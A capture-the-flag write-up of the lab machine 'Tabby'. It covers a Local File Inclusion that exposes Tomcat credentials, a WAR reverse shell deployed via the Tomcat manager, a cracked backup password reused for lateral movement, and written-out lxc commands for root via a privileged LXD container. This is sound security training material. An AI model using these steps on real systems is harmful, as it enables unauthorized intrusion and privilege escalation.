Summary
Tabby is an easy-rated Linux machine created by egre55. Initial foothold is obtained by discovering tomcat credentials with the help of Local File Inclusion. Access as tomcat is granted after deploying a WAR file which contains a reverse shell payload to the tomcat manager text interface. Lateral movement to Ash user is performed by taking advantage of reused passwords and root privileges are gained by abusing the system container manager(LXD) group where Ash is a member of.
Reconnaissance
Nmap scan results show ports 22(ssh), 80(http), and Apache Tomcat running on port 8080(http).
Visiting port 80 displays a hosting site. None of the hyperlinks lead anywhere except for the ‘News’ and the link at the bottom about the statement with regards to a recent data breach. Both leads to the same page.
Clicking the news text directs me to
‘http://megahosting.htb/news.php?file=statement’
I added ‘megahosting’ to my hosts file in order to have access to it.
Local File Inclusion
Now we can browse the page.
The first thing I noticed is the file parameter on the url. I tried doing LFI right away to see if it is vulnerable and in fact it is. I was able to view the contents of /etc/passwd file.
I intercepted the request in Burp Suite in order to fuzz more efficiently. We found our user that we will try to compromise which is ‘Ash’.
Visiting port 8080 displays a default Apache Tomcat page.
Accessing /manager requires us to authenticate. Trying default credentials did not work so I went back to fuzzing the LFI vulnerability.
Initial Foothold
After a lot of research about apache tomcat’s directory structure and lots of fuzzing, I finally found the tomcat-users.xml file which contains credentials.
After authenticating, the page still says access denied. This is due to the roles that were assigned to the tomcat user.
Looking back at the xml file, we can see that we have admin-gui and manager-script role.
I found this apache tomcat documentation which tells us what commands we are allowed to run in the text interface. Running the list command lists all the applications that have been deployed in the web server.
We will abuse the deploy command to upload a reverse shell payload. Using msfvenom, we can create our war file reverse shell.
The deploy commands demonstrated on the documentation we’re not helpful in this situation so I looked for other alternatives and I found this solution in stackoverflow with a little modification. It is important to escape the ‘$’ character on the password field in order to authenticate successfully.
We can now trigger the payload by going to http://tabby.htb:8080/tabby.test
Lateral Movement to Ash
After gaining access, I found an interesting backup archive named ‘16162020_backup.zip’.
I downloaded it to my local machine to enumerate what’s inside. But it was password protected.
I used fcrackzip in order to bruteforce the password. The password is admin@it
The files inside the archive are the same as the ones hosted in the target’s server so I did not find anything useful at all. But I tried to switch to Ash user with the same password used to unzip the archive and I successfully logged in as Ash. We can now grab the user flag.
Privilege Escalation
Ash is a member of the system container manager(LXD) group which can be leveraged to gain root privileges.
I found this article that explains exactly how to abuse lxd. First, we will need to download alpine-builder and create our alpine image as a compressed file.
After building the compressed alpine image, we will transfer it to the target machine. I renamed the file to alpine.tar.gz because the original filename is long.
After transferring the alpine image, we can start the exploitation. Run the following command in Ash’s home directory where our alpine image is also located.
1. lxc image import ./alpine.tar.gz --alias myimage
2. lxc image list(not necessary but will confirm that the image was imported)
The next commands will create a container from the image we imported with high privileges and mount the source which is the ‘/’ directory to ‘/mnt/root’.
3. lxc init myimage root -c security.privileged=true
4. lxc config device add root mydevice disk source=/ path=/mnt/root recursive=true
5. lxc start root
6. lxc exec root /bin/sh
running lxc exec will give us root privileges while in the container and we will be able to access ‘/’ directory and grab the root flag.
That is all for Tabby! Thanks for reading. Have a good day all!
